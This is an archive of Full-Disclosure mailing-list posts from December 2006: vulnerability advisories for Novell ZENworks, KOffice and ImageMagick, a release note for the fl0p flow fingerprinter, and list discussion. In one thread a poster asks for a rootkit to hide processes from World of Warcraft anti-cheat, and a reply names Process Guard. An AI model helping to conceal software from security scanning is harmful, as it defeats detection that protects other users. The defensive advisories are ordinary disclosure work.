Copyright ? 2006 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail customerservice at idefense.com for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. From labs-no-reply at idefense.com Fri Dec 1 21:01:27 2006 From: labs-no-reply at idefense.com (iDefense Labs) Date: Fri, 01 Dec 2006 16:01:27 -0500 Subject: [Full-disclosure] iDefense Security Advisory 12.01.06: Novell ZENworks Asset Management Msg.dll Heap Overflow Vulnerability Message-ID: <45709827.7010400@idefense.com> Novell ZENworks Asset Management Msg.dll Heap Overflow Vulnerability iDefense Security Advisory 12.01.06 http://labs.idefense.com/intelligence/vulnerabilities/ Dec 01, 2006 I. BACKGROUND Novell Inc's ZENworks is a set of tools used to automate IT management and business processes across the various computing resources within an organization. The Task Server and Collection server daemons provide functionality to manage a distributed network of machines. These daemons will typically only be running on the machine that is being used to manage assets. For more information see http://www.novell.com/products/zenworks/ II. DESCRIPTION Remote exploitation of an integer overflow vulnerability in Novell Inc.'s ZENworks Asset Management could potentially allow an attacker to execute arbitrary code with the privileges of the administrator. A heap overflow may occur when processing specially crafted packets sent to the Task Server or Collection Server daemons. This problem specifically exists due to an integer overflow when allocating memory for remotely supplied data. III. ANALYSIS Successful exploitation of this vulnerability could allow a remote attacker to take complete control of the affected system. While researching this vulnerability, iDefense Labs found that the Task Server and Collection Server components were both affected. Additionally, the Collection Client is statically linked with this library. Information on the vulnerability as it relates to the Collection Client can be found in a separate advisory. IV. DETECTION iDefense has confirmed the existence of this vulnerability in version 7.0.0.36 of the CClient.exe and Msg.dll files included with Novell Inc's ZENworks Asset Management 7.0 SP1. Older versions are suspected to be vulnerable as well. V. WORKAROUND iDefense is unaware of any effective workaround for this issue. VI. VENDOR RESPONSE Novell's ZENworks team has addressed this vulnerability within ZENworks 7 Asset Management SP1 IR11. More information can be found by visiting http://support.novell.com/cgi-bin/search/searchtid.cgi?/2974824.htm . VII. CVE INFORMATION A Mitre Corp. Common Vulnerabilities and Exposures (CVE) number has not been assigned yet. VIII. DISCLOSURE TIMELINE 10/16/2006 Initial vendor notification 10/19/2006 Initial vendor response 12/01/2006 Coordinated public disclosure IX. CREDIT This vulnerability was reported to iDefense by Eric Detoisien. Get paid for vulnerability research http://labs.idefense.com/methodology/vulnerability/vcp.php Free tools, research and upcoming events http://labs.idefense.com/ X. LEGAL NOTICES Copyright ? 2006 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail customerservice at idefense.com for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. From security at mandriva.com Fri Dec 1 21:16:01 2006 From: security at mandriva.com (security at mandriva.com) Date: Fri, 1 Dec 2006 14:16:01 -0700 Subject: [Full-disclosure] [ MDKSA-2006:222 ] - Updated koffice packages fixes integer overflow vulnerability Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDKSA-2006:222 http://www.mandriva.com/security/ _______________________________________________________________________ Package : koffice Date : December 1, 2006 Affected: 2007.0 _______________________________________________________________________ Problem Description: An integer overflow was discovered in KOffice's filtering code. By tricking a user into opening a specially crafted PPT file, attackers could crash KOffice or possibly execute arbitrary code with the user's privileges. The updated packages have been patched to correct this issue. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6120 _______________________________________________________________________ Updated Packages: Mandriva Linux 2007.0: 97ad85cf8411c6ff5de87a62aab94a35 2007.0/i586/koffice-1.5.91-3.2mdv2007.0.i586.rpm db50d5559832bbb2dbb2c411184d134f 2007.0/i586/koffice-karbon-1.5.91-3.2mdv2007.0.i586.rpm 7c748642ea280486ccc9ad1164924ec6 2007.0/i586/koffice-kexi-1.5.91-3.2mdv2007.0.i586.rpm 6c5a63dc9354f8b1215adc7512c08685 2007.0/i586/koffice-kformula-1.5.91-3.2mdv2007.0.i586.rpm 78f0e4824c86b6c3f43c4d1e9a5b792a 2007.0/i586/koffice-kivio-1.5.91-3.2mdv2007.0.i586.rpm 8c9a702ef82928900043eef81702df35 2007.0/i586/koffice-koshell-1.5.91-3.2mdv2007.0.i586.rpm 20556ba10c0a5e67da7577077df62312 2007.0/i586/koffice-kplato-1.5.91-3.2mdv2007.0.i586.rpm b3319fcc35d5a7d370698196ec75ff92 2007.0/i586/koffice-kpresenter-1.5.91-3.2mdv2007.0.i586.rpm be36984a365fc1e4fbc7b28b931b1bf3 2007.0/i586/koffice-krita-1.5.91-3.2mdv2007.0.i586.rpm 5af60bc6e42cd6489ad018dba76b06a2 2007.0/i586/koffice-kspread-1.5.91-3.2mdv2007.0.i586.rpm 24d4813bee6f2b5814972554d1e6d5ca 2007.0/i586/koffice-kugar-1.5.91-3.2mdv2007.0.i586.rpm 6fae99addb4c1093aa04de1c0e59c97e 2007.0/i586/koffice-kword-1.5.91-3.2mdv2007.0.i586.rpm 7ae26f275efedce5d44d79f392f0bb58 2007.0/i586/koffice-progs-1.5.91-3.2mdv2007.0.i586.rpm 3483943311cd9d80368fe3d08f58c371 2007.0/i586/libkoffice2-karbon-1.5.91-3.2mdv2007.0.i586.rpm 597101df425c25e7dd98c9fe9bf17e07 2007.0/i586/libkoffice2-karbon-devel-1.5.91-3.2mdv2007.0.i586.rpm 57e233c194e554e8704d4c32b788a76c 2007.0/i586/libkoffice2-kexi-1.5.91-3.2mdv2007.0.i586.rpm 2c4c98f62b419e63c0ef65979321deda 2007.0/i586/libkoffice2-kexi-devel-1.5.91-3.2mdv2007.0.i586.rpm a71985bc483afedf378415adce427a06 2007.0/i586/libkoffice2-kformula-1.5.91-3.2mdv2007.0.i586.rpm 994e26bb97eac10fdd2e09cca64b87a9 2007.0/i586/libkoffice2-kformula-devel-1.5.91-3.2mdv2007.0.i586.rpm 4c41e347712800078a820306a98a26c8 2007.0/i586/libkoffice2-kivio-1.5.91-3.2mdv2007.0.i586.rpm 000ae5e267e281e764b95dccb9c4b84e 2007.0/i586/libkoffice2-kivio-devel-1.5.91-3.2mdv2007.0.i586.rpm f23734cbd98541eecdeb258c0732fc1a 2007.0/i586/libkoffice2-koshell-1.5.91-3.2mdv2007.0.i586.rpm dc638d9155717c2c4091b9da2e55144c 2007.0/i586/libkoffice2-kplato-1.5.91-3.2mdv2007.0.i586.rpm f6d05ae189da6de29cc0c69afab5027b 2007.0/i586/libkoffice2-kpresenter-1.5.91-3.2mdv2007.0.i586.rpm 87d31c59a56729a2f4e9bddc36ea8c32 2007.0/i586/libkoffice2-kpresenter-devel-1.5.91-3.2mdv2007.0.i586.rpm 2fd250793b43f2bb2255d97859f886d2 2007.0/i586/libkoffice2-krita-1.5.91-3.2mdv2007.0.i586.rpm 6c383e3918558aded1e61ddfdadb7273 2007.0/i586/libkoffice2-krita-devel-1.5.91-3.2mdv2007.0.i586.rpm 51ed465cb0c6ee89975aec7f1262ab66 2007.0/i586/libkoffice2-kspread-1.5.91-3.2mdv2007.0.i586.rpm 0663f72f3a1bdce3672899a469d6972b 2007.0/i586/libkoffice2-kspread-devel-1.5.91-3.2mdv2007.0.i586.rpm 04dce49f0d17bdd14716d53ea8e1da0f 2007.0/i586/libkoffice2-kugar-1.5.91-3.2mdv2007.0.i586.rpm 70816b062ed237a79478e3c248922cdd 2007.0/i586/libkoffice2-kugar-devel-1.5.91-3.2mdv2007.0.i586.rpm a8e1d9c67a02b6910defc0e09b4716f7 2007.0/i586/libkoffice2-kword-1.5.91-3.2mdv2007.0.i586.rpm dd88904044b5103407fda7c1a2e53fde 2007.0/i586/libkoffice2-kword-devel-1.5.91-3.2mdv2007.0.i586.rpm 8619b90e23e355b545230c6a9fbf5cd2 2007.0/i586/libkoffice2-progs-1.5.91-3.2mdv2007.0.i586.rpm 8c4e1ccdfe2b69d66739aa04c09b4eae 2007.0/i586/libkoffice2-progs-devel-1.5.91-3.2mdv2007.0.i586.rpm 18f79118122cdc73e54dfec4d9365091 2007.0/SRPMS/koffice-1.5.91-3.2mdv2007.0.src.rpm Mandriva Linux 2007.0/X86_64: 0d4734623788de46f16fb9866362fb60 2007.0/x86_64/koffice-1.5.91-3.2mdv2007.0.x86_64.rpm 6e9294e503e496542c867c9f62298731 2007.0/x86_64/koffice-karbon-1.5.91-3.2mdv2007.0.x86_64.rpm 65907aa84ed619962aa87599ea5c922c 2007.0/x86_64/koffice-kexi-1.5.91-3.2mdv2007.0.x86_64.rpm db489203dc559d631df6cfc7fafe93cd 2007.0/x86_64/koffice-kformula-1.5.91-3.2mdv2007.0.x86_64.rpm 1500fb9ee551eaee484254cb2424e57a 2007.0/x86_64/koffice-kivio-1.5.91-3.2mdv2007.0.x86_64.rpm 9555a5d61aa1132196ab53474d86e3b5 2007.0/x86_64/koffice-koshell-1.5.91-3.2mdv2007.0.x86_64.rpm b2315a4e783d8482d56ee0723e5a9b0e 2007.0/x86_64/koffice-kplato-1.5.91-3.2mdv2007.0.x86_64.rpm c742e5bbef3f868d538cfd65ee581623 2007.0/x86_64/koffice-kpresenter-1.5.91-3.2mdv2007.0.x86_64.rpm 9bb89a8140594af37cb5533039f8b8b1 2007.0/x86_64/koffice-krita-1.5.91-3.2mdv2007.0.x86_64.rpm 20702a2f45aa65bf5fd71034c379d877 2007.0/x86_64/koffice-kspread-1.5.91-3.2mdv2007.0.x86_64.rpm ba4d9249380cb17d86f1cc20b15a6da0 2007.0/x86_64/koffice-kugar-1.5.91-3.2mdv2007.0.x86_64.rpm 96a772d36130780a92a0d14a51b82173 2007.0/x86_64/koffice-kword-1.5.91-3.2mdv2007.0.x86_64.rpm 3ef642a955a0de9f4440a9b7f5ed112d 2007.0/x86_64/koffice-progs-1.5.91-3.2mdv2007.0.x86_64.rpm 90aefb67aefcc6c70e3f0acafdf2d20a 2007.0/x86_64/lib64koffice2-karbon-1.5.91-3.2mdv2007.0.x86_64.rpm d99922c80f817fe39778f6711cc48a24 2007.0/x86_64/lib64koffice2-karbon-devel-1.5.91-3.2mdv2007.0.x86_64.rpm d1ce54c1da5baf6e5d78f6dbb9df2e88 2007.0/x86_64/lib64koffice2-kexi-1.5.91-3.2mdv2007.0.x86_64.rpm 5b5ab70a073c52d1866f8f0504d696d8 2007.0/x86_64/lib64koffice2-kexi-devel-1.5.91-3.2mdv2007.0.x86_64.rpm b27623062be6e6c56afab8d64215eda4 2007.0/x86_64/lib64koffice2-kformula-1.5.91-3.2mdv2007.0.x86_64.rpm c9d45dfb4c71793c6a04772da52a4c27 2007.0/x86_64/lib64koffice2-kformula-devel-1.5.91-3.2mdv2007.0.x86_64.rpm c541021dfc624c5b01a2994d3e62354b 2007.0/x86_64/lib64koffice2-kivio-1.5.91-3.2mdv2007.0.x86_64.rpm 78fbf699ce7bd245f7ffcce694488bd8 2007.0/x86_64/lib64koffice2-kivio-devel-1.5.91-3.2mdv2007.0.x86_64.rpm bc14a92c9079f26509110d8dcfef4234 2007.0/x86_64/lib64koffice2-koshell-1.5.91-3.2mdv2007.0.x86_64.rpm 04df83ce95051488ba0165e02a647438 2007.0/x86_64/lib64koffice2-kplato-1.5.91-3.2mdv2007.0.x86_64.rpm 8bcc5137ccf41bba147986de8d8b95e4 2007.0/x86_64/lib64koffice2-kpresenter-1.5.91-3.2mdv2007.0.x86_64.rpm 9157afe6ed8b9f4745cd7f0333ac484f 2007.0/x86_64/lib64koffice2-kpresenter-devel-1.5.91-3.2mdv2007.0.x86_64.rpm 9edddd073414539f674939a95412ea9e 2007.0/x86_64/lib64koffice2-krita-1.5.91-3.2mdv2007.0.x86_64.rpm 4e54205509fe323caaaecab61acb2e20 2007.0/x86_64/lib64koffice2-krita-devel-1.5.91-3.2mdv2007.0.x86_64.rpm 8149704298a9bfe1edcd903b73536654 2007.0/x86_64/lib64koffice2-kspread-1.5.91-3.2mdv2007.0.x86_64.rpm ed82f407c7be218dba128252b4de09f3 2007.0/x86_64/lib64koffice2-kspread-devel-1.5.91-3.2mdv2007.0.x86_64.rpm 62a023ac8bb89806a0080797f6f9a03f 2007.0/x86_64/lib64koffice2-kugar-1.5.91-3.2mdv2007.0.x86_64.rpm 0479922c3466a2f4ba2c5079d55fe634 2007.0/x86_64/lib64koffice2-kugar-devel-1.5.91-3.2mdv2007.0.x86_64.rpm 7039997ba59f0e670e8f1352c0c82711 2007.0/x86_64/lib64koffice2-kword-1.5.91-3.2mdv2007.0.x86_64.rpm aed8cd41144d076f9ee51b6cd0966a51 2007.0/x86_64/lib64koffice2-kword-devel-1.5.91-3.2mdv2007.0.x86_64.rpm aacf502f62097c102dc44be1387763d7 2007.0/x86_64/lib64koffice2-progs-1.5.91-3.2mdv2007.0.x86_64.rpm d30e35e35d4e4832f78a61e116114a33 2007.0/x86_64/lib64koffice2-progs-devel-1.5.91-3.2mdv2007.0.x86_64.rpm 18f79118122cdc73e54dfec4d9365091 2007.0/SRPMS/koffice-1.5.91-3.2mdv2007.0.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.2.2 (GNU/Linux) iD8DBQFFcHEwmqjQ0CJFipgRAmRsAJ9maSoEYLobFpNgiMarEgFpcFVQwgCdETbx BpC/9xb5tzUEDiL6MwB8IXQ= =Popd -----END PGP SIGNATURE----- From security at mandriva.com Sat Dec 2 00:17:01 2006 From: security at mandriva.com (security at mandriva.com) Date: Fri, 1 Dec 2006 17:17:01 -0700 Subject: [Full-disclosure] [ MDKSA-2006:223 ] - Updated ImageMagick packages fixes vulnerability Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDKSA-2006:223 http://www.mandriva.com/security/ _______________________________________________________________________ Package : ImageMagick Date : December 1, 2006 Affected: 2006.0, Corporate 3.0, Corporate 4.0 _______________________________________________________________________ Problem Description: Multiple buffer overflows in Imagemagick 6.0 before 6.0.6.2, and 6.2 before 6.2.4.5, has unknown impact and user-assisted attack vectors via a crafted SGI image. Updated packages have been patched to correct this issue. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5868 _______________________________________________________________________ Updated Packages: Mandriva Linux 2006.0: df62dd8449b08426a4188d5959b3f823 2006.0/i586/ImageMagick-6.2.4.3-1.4.20060mdk.i586.rpm e87bbddff33171aae89d1d08400907a7 2006.0/i586/ImageMagick-doc-6.2.4.3-1.4.20060mdk.i586.rpm 8755d8beabe9a85f3e7a07b73d071c59 2006.0/i586/libMagick8.4.2-6.2.4.3-1.4.20060mdk.i586.rpm 2b6ae5e3b4c8e187e095442e7dcd5c24 2006.0/i586/libMagick8.4.2-devel-6.2.4.3-1.4.20060mdk.i586.rpm d7e61aa5943b52eb374b0a2e44232e93 2006.0/i586/perl-Image-Magick-6.2.4.3-1.4.20060mdk.i586.rpm e5875ef8dd63237d5c7c74a441b123fc 2006.0/SRPMS/ImageMagick-6.2.4.3-1.4.20060mdk.src.rpm Mandriva Linux 2006.0/X86_64: 973d1bb7026248e93c9f1a16eba0cfaf 2006.0/x86_64/ImageMagick-6.2.4.3-1.4.20060mdk.x86_64.rpm ca759633ecf8ef52b1c34f55d5a3af6d 2006.0/x86_64/ImageMagick-doc-6.2.4.3-1.4.20060mdk.x86_64.rpm f65de07d50364a3c861f50ce6f11fee4 2006.0/x86_64/lib64Magick8.4.2-6.2.4.3-1.4.20060mdk.x86_64.rpm c9e86c379bdfeb36e25bfd34e094b921 2006.0/x86_64/lib64Magick8.4.2-devel-6.2.4.3-1.4.20060mdk.x86_64.rpm 9d58fe1606d8f1f0f6a225df3ac58b48 2006.0/x86_64/perl-Image-Magick-6.2.4.3-1.4.20060mdk.x86_64.rpm e5875ef8dd63237d5c7c74a441b123fc 2006.0/SRPMS/ImageMagick-6.2.4.3-1.4.20060mdk.src.rpm Corporate 3.0: fc15d48d236f0d1f738c795190081ddd corporate/3.0/i586/ImageMagick-5.5.7.15-6.9.C30mdk.i586.rpm 3ba801afddeb42759aebd891971b5fce corporate/3.0/i586/ImageMagick-doc-5.5.7.15-6.9.C30mdk.i586.rpm 35c8a337172b91501486381be4e0aa7d corporate/3.0/i586/libMagick5.5.7-5.5.7.15-6.9.C30mdk.i586.rpm 3273f233005c79adf0602ade443de675 corporate/3.0/i586/libMagick5.5.7-devel-5.5.7.15-6.9.C30mdk.i586.rpm 8dfce9d9e00005e990c1203c1144ac34 corporate/3.0/i586/perl-Magick-5.5.7.15-6.9.C30mdk.i586.rpm 3cf9bff07102ada97373a66c5f4c6e05 corporate/3.0/SRPMS/ImageMagick-5.5.7.15-6.9.C30mdk.src.rpm Corporate 3.0/X86_64: 0f8193fed5ac7b344398b9e99fe5bccb corporate/3.0/x86_64/ImageMagick-5.5.7.15-6.9.C30mdk.x86_64.rpm bdae28be1bcacf4f5bc6d9bdfa589cbd corporate/3.0/x86_64/ImageMagick-doc-5.5.7.15-6.9.C30mdk.x86_64.rpm fa4a5fe3e447770c33ef0596da8570fb corporate/3.0/x86_64/lib64Magick5.5.7-5.5.7.15-6.9.C30mdk.x86_64.rpm 8af081adcd750d5edec44bf1e85e5c7d corporate/3.0/x86_64/lib64Magick5.5.7-devel-5.5.7.15-6.9.C30mdk.x86_64.rpm e238642447217ade5a772c4b12b492b3 corporate/3.0/x86_64/perl-Magick-5.5.7.15-6.9.C30mdk.x86_64.rpm 3cf9bff07102ada97373a66c5f4c6e05 corporate/3.0/SRPMS/ImageMagick-5.5.7.15-6.9.C30mdk.src.rpm Corporate 4.0: dde2f028a95732f3d5fd5bfd48ede727 corporate/4.0/i586/ImageMagick-6.2.4.3-1.4.20060mlcs4.i586.rpm 6affed772cabdc8e8eb6e6ed96efb178 corporate/4.0/i586/ImageMagick-doc-6.2.4.3-1.4.20060mlcs4.i586.rpm 426d44c76834a660ea48c09719048de2 corporate/4.0/i586/libMagick8.4.2-6.2.4.3-1.4.20060mlcs4.i586.rpm 4cc0f80f0bbfdbc1c26a497f14e2dd0d corporate/4.0/i586/libMagick8.4.2-devel-6.2.4.3-1.4.20060mlcs4.i586.rpm 9deab133788e00cf6487a057042c3ae0 corporate/4.0/i586/perl-Image-Magick-6.2.4.3-1.4.20060mlcs4.i586.rpm 0b75266159c73fcb8a0f7027d208bee2 corporate/4.0/SRPMS/ImageMagick-6.2.4.3-1.4.20060mlcs4.src.rpm Corporate 4.0/X86_64: 283a0751148b3468bd3e2281d819f08d corporate/4.0/x86_64/ImageMagick-6.2.4.3-1.4.20060mlcs4.x86_64.rpm 48ee2e7835b97a89e27342c3a27db913 corporate/4.0/x86_64/ImageMagick-doc-6.2.4.3-1.4.20060mlcs4.x86_64.rpm fad038ed56f886f4656302721a616578 corporate/4.0/x86_64/lib64Magick8.4.2-6.2.4.3-1.4.20060mlcs4.x86_64.rpm 17b7841d6459f0a52662f43d16f09771 corporate/4.0/x86_64/lib64Magick8.4.2-devel-6.2.4.3-1.4.20060mlcs4.x86_64.rpm dbcfd793204ead891cbf779c1075287e corporate/4.0/x86_64/perl-Image-Magick-6.2.4.3-1.4.20060mlcs4.x86_64.rpm 0b75266159c73fcb8a0f7027d208bee2 corporate/4.0/SRPMS/ImageMagick-6.2.4.3-1.4.20060mlcs4.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.2.2 (GNU/Linux) iD8DBQFFcJi1mqjQ0CJFipgRAoCvAJ9sJwsy6KmxvLwFtEyFiCoLvVHIaACgj+2v kI0mULDMWX7ydgtZ+bArC40= =m55O -----END PGP SIGNATURE----- From douglashaider at hotmail.com Sat Dec 2 05:55:49 2006 From: douglashaider at hotmail.com (Douglas Haider) Date: Fri, 01 Dec 2006 22:55:49 -0700 Subject: [Full-disclosure] 802.1X tool? In-Reply-To: <45708D89.2030407@csuohio.edu> Message-ID: The Funk Odyssey tool is now owned by Juniper. That being said, I have used the Odyssey tool and I am impressed with its functionality, especialy from a risk management / controls perspective. Respectfully, Douglas >From: Michael Holstein >To: Full-Disclosure ,Wifisec > >Subject: Re: [Full-disclosure] 802.1X tool? >Date: Fri, 01 Dec 2006 15:16:09 -0500 > >Meetinghouse (AEGIS) or Funk (Odyssey). > >Note : Meetinghouse is now owned by Cisco. > >Cheers, > >~Mike. > > >Ozan Ozkara wrote: >>Hi folks, >> >>I am trying to find a tool which provides automatic client configuration >>for 802.1X implementation in windows environment. I'm trying to >>implement 802.1x authentication for >>both wired and wireless connection. Is there any way to do remote client >>configuration tool for win32 environment. Will i be able to do that? >> >>I'd appreciate any real world experience on the subject. >> >>thanks >> >> >> >> >>------------------------------------------------------------------------ >> >>_______________________________________________ >>Full-Disclosure - We believe in it. >>Charter: http://lists.grok.org.uk/full-disclosure-charter.html >>Hosted and sponsored by Secunia - http://secunia.com/ _________________________________________________________________ Stay up-to-date with your friends through the Windows Live Spaces friends list. http://clk.atdmt.com/MSN/go/msnnkwsp0070000001msn/direct/01/?href=http://spaces.live.com/spacesapi.aspx?wx_action=create&wx_url=/friends.aspx&mk From guillaume.barberot at gmail.com Sat Dec 2 16:57:37 2006 From: guillaume.barberot at gmail.com (Guillaume Barberot) Date: Sat, 2 Dec 2006 17:57:37 +0100 Subject: [Full-disclosure] 802.1X tool? In-Reply-To: References: <45708D89.2030407@csuohio.edu> Message-ID: more over the Juniper-Funk-Odyssey-Client can choose to connect only one network interface if both lan an Wlan interface are connected by deconnecting the other one.GB. 2006/12/2, Douglas Haider : > The Funk Odyssey tool is now owned by Juniper. That being said, I have used > the Odyssey tool and I am impressed with its functionality, especialy from a > risk management / controls perspective. > > Respectfully, > Douglas > From kefka at kevinbeardsucks.com Sun Dec 3 01:58:07 2006 From: kefka at kevinbeardsucks.com (kefka) Date: Sat, 02 Dec 2006 20:58:07 -0500 Subject: [Full-disclosure] how to hide files, services and process in windows 2k/xp/2k3 box In-Reply-To: <456F6FC5.5090802@markbaker.net> References: 003401c58548$1272f370$6f64a8c0@microsof28e7c5 <456F6FC5.5090802@markbaker.net> Message-ID: <45722F2F.9000803@kevinbeardsucks.com> Process Guard and other similar application can do this for you. You're trying to keep some anti-cheat engine from scanning your cheats, correct? --------------------- Mark Baker wrote: >I am trying to find a rootkit to hide processes ad dll's from World of >Warcraft but can't find where to download AFX rootkit. Can you direct >me where to download the rootkit and instructions? > >Thanks! > >_______________________________________________ >Full-Disclosure - We believe in it. >Charter: http://lists.grok.org.uk/full-disclosure-charter.html >Hosted and sponsored by Secunia - http://secunia.com/ > > > From lcamtuf at dione.ids.pl Sun Dec 3 05:41:08 2006 From: lcamtuf at dione.ids.pl (Michal Zalewski) Date: Sun, 3 Dec 2006 06:41:08 +0100 (CET) Subject: [Full-disclosure] fl0p - passive L7 flow fingerprinting Message-ID: I'd like to announce the availability of a tool called fl0p, which I hope might be of some interest to various network security dudes and dudettes on the list (and will hopefully serve as a convenient framework for cool research). The tool is a simple flow-analyzing passive L7 fingerprinter. It examines the sequence of client-server exchanges, their relative layer 7 payload sizes, and transmission intervals (as opposed to inspecting the contents, which is what most passive fingerprinters and "smart" sniffers would do to analyze transmissions). This is then matched against a database of traffic pattern signatures to infer some interesting facts about the traffic. This is along the lines of research done by Solar Designer and Dug Song on timing SSH sessions (though I do not focus on protocol design flaws); this type of analysis got very little air time to date, but unjustly so - there are several interesting benefits of even such a superficial flow analysis: - General insight into legitimate encrypted sessions can be gained: for example, it is trivial to remotely and automatically spot SSH login failures, and react accordingly: the timing and sequence of packets depending on the version of SSH, negotiated protocols, and authentication outcome, will differ quite drastically. - Human actions can be easily told apart from automated efforts based on the latency inherent to wetware I/O bus. As such, you can spot manual poking with your SMTP service despite the noise generated by Internet worms and spam zombies; or, you can tell even a subtle automated SSH login attempt from a typo done by a human being. This extends to most other text-based services. Even such subtle features as user security settings and displayed prompts can be determined: first-time cryptographic key trust question leaves its trace in session timings. - Rogue cryptography can be examined: general flow behavior remains relatively constant regardless of the technology used to hide the actual transferred data. As such, backdoors or firewall evasion techniques that use HTTPS on 443/tcp should be easy to diagnose, either by directly matching relaxed signatures for the tunneled traffic itself, or by spotting unusual client-server traffic / timing imbalances. Now, of course, all this could be achieved before in a slow and painful way - but with fl0p, you have a (primitive but working) tool to simply say: tcp * = < s27/15 c27/15 s300/100 > : SSH1 - client chose to refuse server key tcp * = s12 c at 1 s28 + c52 s at 1 c at 1 s at 3 : SSH1 - invalid password attempt tcp * = s12 c at 1 s28 c52 s at 1 c at 1 s at 3 : SSH1 - automated password guessing tcp * = c30/30 + c1 c1 c1 : Possible manual Windows telnet input (2) ...then launch the program and go to the movies. An example of fl0p output is as follows: (tcp) 213.195.140.12:4667 -> 213.134.128.25:25 Observed for: 188B, 6 packets, spans 17 seconds Matches: Possible manual line-by-line interaction (hit: 1) (tcp) 83.31.193.40:3403 -> 213.134.128.25:22 Observed for: 584B, 9 packets, spans 5 seconds Matches: SSH1 - client manually accepted key (hit: 1) (tcp) 83.31.193.40:3406 -> 213.134.128.25:22 Observed for: 820B, 18 packets, spans 9 seconds Matches: SSH1 - invalid password attempt (hit: 2) (tcp) 83.31.193.40:3436 -> 213.134.128.25:22 Observed for: 2.9kB, 19 packets, spans 2 seconds Matches: SSH2 - correct password (hit: 2) The tool is available at: http://lcamtuf.coredump.cx/fl0p-devel.tgz ...and is of course LGPLed ("free as in communism"). It is fully functional, albeit still marked as "beta" because of a small signature database (that I'm hoping to extend as a result of this announcement) and (naturally) some spartan documentation. Because of this, at this point, consider it more of a PoC / framework than a standalone fire-and-forget server tool. Your feedback, help, and above all, signature submissions, are as always greatly appreciated. Regards, /mz From matthew.flaschen at gatech.edu Sun Dec 3 06:25:13 2006 From: matthew.flaschen at gatech.edu (Matthew Flaschen) Date: Sun, 03 Dec 2006 01:25:13 -0500 Subject: [Full-disclosure] Financial firms warned of Qaeda cyber attack In-Reply-To: <5e70f6530612010727h6b3af594t6a75fa731f07500a@mail.gmail.com> References: <200612011515526141632399@mail.smumn.edu> <5e70f6530612010727h6b3af594t6a75fa731f07500a@mail.gmail.com> Message-ID: <45726DC9.5060200@gatech.edu> Or, realize that no one lost money in 9/11, even those who had banks in the World Trade Center. Why? Every bank has multiple redundant backups, including offsite storage. Matthew Flaschen TheGesus wrote: > Conclusion: Withdraw and stockpile some cash now. Shoot for at least > three months' cash requirements. Don't wait. Start now. > > ================== > -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 250 bytes Desc: OpenPGP digital signature Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061203/cbe16f4a/attachment.bin From dudevanwinkle at gmail.com Sun Dec 3 09:02:06 2006 From: dudevanwinkle at gmail.com (Dude VanWinkle) Date: Sun, 3 Dec 2006 04:02:06 -0500 Subject: [Full-disclosure] Financial firms warned of Qaeda cyber attack In-Reply-To: <45726DC9.5060200@gatech.edu> References: <200612011515526141632399@mail.smumn.edu> <5e70f6530612010727h6b3af594t6a75fa731f07500a@mail.gmail.com> <45726DC9.5060200@gatech.edu> Message-ID: On 12/3/06, Matthew Flaschen wrote: > Or, realize that no one lost money in 9/11, even those who had banks in > the World Trade Center. Why? Every bank has multiple redundant > backups, including offsite storage. > hey, you are from gatech...you should know not to use absolutes like "no one lost money in 9/11", especially on a mailing list with: ferg, brian, drsolly, JP, the Randall's, Grandpa, etc, etc; that is run by Gadi! Represent buddy! -JP From michaelslists at gmail.com Sun Dec 3 09:26:15 2006 From: michaelslists at gmail.com (mikeiscool) Date: Sun, 3 Dec 2006 20:26:15 +1100 Subject: [Full-disclosure] Financial firms warned of Qaeda cyber attack In-Reply-To: <45726DC9.5060200@gatech.edu> References: <200612011515526141632399@mail.smumn.edu> <5e70f6530612010727h6b3af594t6a75fa731f07500a@mail.gmail.com> <45726DC9.5060200@gatech.edu> Message-ID: <5e01c29a0612030126r71ebb18ayfc66b65bf04e041c@mail.gmail.com> I lost money. On 12/3/06, Matthew Flaschen wrote: > Or, realize that no one lost money in 9/11, even those who had banks in > the World Trade Center. Why? Every bank has multiple redundant > backups, including offsite storage. > > Matthew Flaschen > > TheGesus wrote: > > Conclusion: Withdraw and stockpile some cash now. Shoot for at least > > three months' cash requirements. Don't wait. Start now. > > > > ================== > > > > > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > > 